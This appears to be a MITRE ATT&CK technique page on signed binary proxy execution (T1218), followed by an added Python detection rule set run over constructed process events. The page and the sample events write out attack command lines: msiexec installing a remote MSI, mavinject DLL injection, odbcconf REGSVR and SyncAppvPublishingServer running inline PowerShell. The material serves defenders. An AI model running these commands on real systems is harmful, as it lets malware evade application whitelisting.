Signed Binary Proxy Execution

Binaries signed with trusted digital certificates are allowed to execute on Windows systems that enforce digital signature validation. Several Microsoft-signed binaries present on a default Windows installation can be used to proxy the execution of other files. Because the signature attests to the publisher of the binary and not to whatever that binary is told to load or run, adversaries may abuse this behavior to execute malicious files in a way that bypasses application whitelisting and signature validation. This technique covers proxy execution methods that are not already accounted for within the existing techniques.


Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution, whether the package is on local disk or reachable over the network (for example, hosted on a remote web server).[1][2][3] Msiexec.exe may also be used to execute DLLs.[1]

  • msiexec.exe /q /i "C:\path\to\file.msi"
  • msiexec.exe /q /i http[:]//site[.]com/file.msi
  • msiexec.exe /y "C:\path\to\file.dll"


Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to inject a DLL into a running process. [4]

  • "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
  • C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>


SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe: the binary hosts the PowerShell engine in its own process, so the script runs without a powershell.exe process being created. [5]


Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.[6] The utility can be misused to execute functionality equivalent to Regsvr32: the REGSVR action loads the specified DLL and calls its registration export, executing the DLL's code.[7][8][9]

  • odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}

Several other binaries exist that may be used to perform similar behavior. [10]

ID: T1218

Tactic: Defense Evasion, Execution

Platform: Windows

Permissions Required: User

Data Sources: Process monitoring, Process command-line parameters

Supports Remote: No

Defense Bypassed: Application whitelisting, Digital Certificate Validation

Contributors: Nishan Maharjan, @loki248; Hans Christoffer Gaardløs; Praetorian

Version: 2.0


Cobalt Group

Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.[9]


Duqu

Duqu has used msiexec to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.[11]


Rancor

Rancor has used msiexec to download and execute malicious installer files over HTTP.[2]


Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these binaries if they are not required for a given system or network to prevent potential misuse by adversaries. If these binaries are required for use, then restrict execution of them to privileged accounts or groups that need to use them to lessen the opportunities for malicious use.


Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the internet, may be indicative of an intrusion. Identify the binary by the image path or the PE OriginalFileName rather than by the name that appears in the command line, since a copy of a signed binary that has been renamed keeps both its signature and its OriginalFileName. Correlate activity with other suspicious behavior (the parent process, for instance) to reduce false positives that may be due to normal benign use by users and administrators.
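The following is an added example, not code from the ATT&CK page or from MITRE, that turns the detection guidance above and the four binaries described earlier (msiexec.exe, mavinject.exe, SyncAppvPublishingServer.exe, odbcconf.exe) into rule logic run over a handful of constructed process-creation events in a Sysmon Event ID 1 / Security 4688 shape. The event fields, the sample events, the severity scheme, the `;` heuristic for SyncAppvPublishingServer.exe and the inclusion of msiexec's `/z` switch alongside `/y` are this example's own assumptions, not something the page states.

```python
"""Detection logic for signed binary proxy execution (T1218) over
constructed process-creation events. Example code, not from the ATT&CK page."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon EID 1 / Security 4688 style).
    Field names are this example's own, not a vendor schema."""
    image: str                # Image: full path of the created process
    command_line: str         # CommandLine
    parent_image: str         # ParentImage
    original_file_name: str = ""  # OriginalFileName from the PE version resource, if logged


# (rule name, regex over the binary identity, regex over the command line)
# Assumed rule set; thresholds and patterns are illustrative.
RULES = [
    # msiexec fetching a package over HTTP(S) is the indicator the text calls out
    ("msiexec_remote_package", r"msiexec\.exe", r"https?://"),
    # /y registers a DLL (and /z unregisters it); either loads the DLL in-process
    ("msiexec_dll_load", r"msiexec\.exe", r"(?:^|\s)[/-][yz]\s"),
    ("mavinject_injectrunning", r"mavinject(?:32)?\.exe", r"/injectrunning\b"),
    ("odbcconf_regsvr", r"odbcconf\.exe", r"\bregsvr\b"),
    # heuristic: a ';' in the argument lets trailing text reach the hosted PowerShell engine
    ("syncappv_inline_powershell", r"syncappvpublishingserver\.exe", r";"),
]
COMPILED = [(n, re.compile(b, re.I), re.compile(c, re.I)) for n, b, c in RULES]

# Parents that make a hit more interesting (assumed list)
SUSPICIOUS_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "winword.exe", "excel.exe", "outlook.exe"}


@dataclass(frozen=True)
class Finding:
    index: int      # position of the event in the input list
    rule: str
    severity: str   # "high" or "medium"


def binary_identity(ev: ProcessEvent) -> str:
    """Identify the binary by OriginalFileName, falling back to the image basename.
    A renamed copy of a signed binary keeps its signature and its OriginalFileName,
    so matching argv[0] from the command line would miss it."""
    return (ev.original_file_name or ntpath.basename(ev.image)).lower()


def analyze(events):
    findings = []
    for idx, ev in enumerate(events):
        name = binary_identity(ev)
        parent = ntpath.basename(ev.parent_image).lower()
        # image basename disagreeing with OriginalFileName means the binary was renamed
        renamed = bool(ev.original_file_name) and ntpath.basename(ev.image).lower() != name
        for rule, bin_re, cmd_re in COMPILED:
            if bin_re.fullmatch(name) and cmd_re.search(ev.command_line):
                severity = "high" if (parent in SUSPICIOUS_PARENTS or renamed) else "medium"
                findings.append(Finding(idx, rule, severity))
    return findings


# Constructed sample events (not real telemetry); index noted for reference
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",                         # 0: remote package
                 r"msiexec.exe /q /i http://site.com/file.msi",
                 r"C:\Windows\System32\cmd.exe", "msiexec.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",                         # 1: benign local install
                 r'msiexec.exe /i "C:\Users\alice\Downloads\7zip.msi"',
                 r"C:\Windows\explorer.exe", "msiexec.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",                         # 2: DLL via /y
                 r'msiexec.exe /y "C:\Users\Public\evil.dll"',
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "msiexec.exe"),
    ProcessEvent(r"C:\Windows\System32\mavinject.exe",                       # 3: DLL injection
                 r"mavinject.exe 4212 /INJECTRUNNING C:\Users\Public\payload.dll",
                 r"C:\Windows\System32\cmd.exe", "mavinject.exe"),
    ProcessEvent(r"C:\Windows\System32\odbcconf.exe",                        # 4: REGSVR from explorer
                 r'odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}',
                 r"C:\Windows\explorer.exe", "odbcconf.exe"),
    ProcessEvent(r"C:\Windows\System32\SyncAppvPublishingServer.exe",        # 5: inline PowerShell
                 r'SyncAppvPublishingServer.exe "n;Start-Process calc.exe"',
                 r"C:\Windows\System32\cmd.exe", "syncappvpublishingserver.exe"),
    ProcessEvent(r"C:\Windows\System32\odbcconf.exe",                        # 6: benign DSN config
                 r'odbcconf.exe /A {CONFIGSYSDSN "SQL Server" "DSN=Reports|Server=db01"}',
                 r"C:\Windows\System32\msiexec.exe", "odbcconf.exe"),
    ProcessEvent(r"C:\Users\Public\update.exe",                              # 7: renamed msiexec copy
                 r"update.exe /q /i https://cdn.example.net/x.msi",
                 r"C:\Windows\explorer.exe", "msiexec.exe"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] event {f.index}: {f.rule} :: {SAMPLE_EVENTS[f.index].command_line}")
```

Events 1 and 6 produce no finding, which is the point of keying on the specific switch (REGSVR, /y, /INJECTRUNNING, a URL) rather than on the binary alone; event 7 is still caught although the binary was copied and renamed, because the rule matches OriginalFileName and the rename itself raises the severity.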